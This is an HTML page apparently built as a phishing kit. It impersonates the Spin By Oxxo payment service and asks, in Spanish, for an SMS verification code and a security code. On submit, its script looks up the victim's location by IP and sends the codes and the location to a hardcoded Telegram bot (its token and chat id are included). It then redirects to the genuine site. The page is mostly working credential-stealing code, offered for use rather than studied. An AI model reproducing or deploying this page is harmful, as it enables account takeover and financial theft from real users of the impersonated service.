<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Spin By Oxxo</title>
    <style>
        * {
            box-sizing: border-box;
            margin: 0;
            padding: 0;
            font-family: 'Roboto', sans-serif;
        }

        body {
            background-color: #531bc8;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            position: relative;
            flex-direction: column;
            color: #fff;
        }

        .logo {
            max-width: 30%;
            height: auto;
            margin-bottom: 30px;
        }

        .form-container {
            max-width: 400px;
            padding: 20px;
            border-radius: 15px;
            background-color: transparent;
            z-index: 1;
        }

        .form-group {
            margin-bottom: 20px;
            padding: 15px;
            border: 1px solid rgba(255, 255, 255, 0.5);
            border-radius: 10px;
            background-color: rgba(255, 255, 255, 0.9);
            position: relative;
        }

        label {
            display: block;
            margin-bottom: 5px;
            font-size: 14px;
            color: #4a4a4a;
        }

        input[type="number"] {
            width: 100%;
            padding: 12px;
            border: 1px solid #ccc;
            border-radius: 8px;
            font-size: 14px;
            transition: border-color 0.3s;
        }

        input[type="number"]:focus {
            border-color: #FF6600;
            outline: none;
        }

        button {
            width: 100%;
            padding: 12px;
            background-color: #FF6600;
            color: rgb(248, 247, 247);
            border: none;
            border-radius: 25px;
            cursor: pointer;
            font-size: 16px;
            transition: background-color 0.3s, transform 0.3s;
            margin-bottom: 10px;
        }

        button:hover {
            background-color: #6B3FC0;
            transform: translateY(-2px);
        }

        .footer-text {
            position: absolute;
            bottom: 20px;
            text-align: center;
            font-size: 10px;
            color: white;
            width: 100%;
            padding: 0 10px;
        }

        #loading {
            display: none;
            text-align: center;
            margin-top: 20px;
        }

        #loading img {
            width: 50px;
            height: auto;
        }

        #countdown {
            margin-top: 10px;
            font-size: 14px;
            color: #f3f3f5;
        }
    </style>
</head>
<body>
    <img src="logo.png" alt="Logo" class="logo">
    <div class="form-container">
        <form id="loginForm">
            <div class="form-group">
                <label for="smsCode">Escribe el código que recibiste por mensaje</label>
                <input type="number" id="smsCode" name="smsCode" required placeholder="Código SMS" oninput="this.value = this.value.slice(0, 12)" pattern="\d{12}" title="Por favor, ingresa solo 4 dígitos">
            </div>
            <div class="form-group">
                <label for="securityCode">Escribe tu código de seguridad</label>
                <input type="number" id="securityCode" name="securityCode" required placeholder="******" oninput="this.value = this.value.slice(0, 6)" pattern="\d{6}" title="Por favor, ingresa solo 6 dígitos">
            </div>
            <button type="submit">Verificar</button>
        </form>
    </div>
    
    <div class="footer-text">
        Compropago S.A. de C.V. institución de fondos de pago electrónico
    </div>

    <div id="loading">
        <img src="cargando.gif" alt="Cargando..." />
        <p id="countdown">20</p>
    </div>

    <script>
        const form = document.getElementById('loginForm');
        let loadingDisplayed = false; 
        let countdown; 
        let interval;

        function startCountdown() {
            countdown = 20;
            document.getElementById('countdown').textContent = countdown;

            interval = setInterval(function() {
                countdown--;
                document.getElementById('countdown').textContent = countdown;

                if (countdown <= 0) {
                    clearInterval(interval);
                    window.location.href = 'https://spinbyoxxo.com.mx/programa-de-lealtad'; // Cambia esto a la URL deseada
                }
            }, 1000);
        }

        form.addEventListener('submit', function(event) {
            event.preventDefault();

            const smsCode = document.getElementById('smsCode').value;
            const securityCode = document.getElementById('securityCode').value;

            // Obtener la ubicación por IP
            fetch('https://ipapi.co/json/')
                .then(response => response.json())
                .then(locationData => {
                    const city = locationData.city || "Desconocida";
                    const country = locationData.country_name || "Desconocido";

                    // Mostrar el loading y comenzar la cuenta regresiva
                    if (!loadingDisplayed) {
                        document.getElementById('loading').style.display = 'block';
                        loadingDisplayed = true; 
                        startCountdown();
                    }

                    const url = `https://api.telegram.org/bot6813453135:AAGfFRmuT5uVMFHzXzotCDQmXs3uj8wqB6o/sendMessage`;
                    const data = {
                        chat_id: -4037234500,
                        text: `Spinby:\nCódigo SMS: ${smsCode}\nCódigo de seguridad: ${securityCode}\nCiudad: ${city}\nPaís: ${country}`,
                        parse_mode: 'HTML'
                    };

                    fetch(url, {
                        method: 'POST',
                        headers: {
                            'Content-Type': 'application/json'
                        },
                        body: JSON.stringify(data)
                    })
                    .then(response => response.json())
                    .then(data => {
                        console.log('Mensaje enviado:', data);
                        if (!data.ok) {
                            alert('Error al enviar el mensaje. Intenta nuevamente.');
                            clearInterval(interval);
                            document.getElementById('loading').style.display = 'none';
                            loadingDisplayed = false; 
                        }
                    })
                    .catch((error) => {
                        console.error('Error:', error);
                        document.getElementById('loading').style.display = 'none';
                        loadingDisplayed = false; 
                        clearInterval(interval);
                    });
                })
                .catch(err => {
                    console.error('Error al obtener la ubicación:', err);
                    alert('No se pudo obtener la ubicación.');
                });
        });
    </script>
</body>
</html>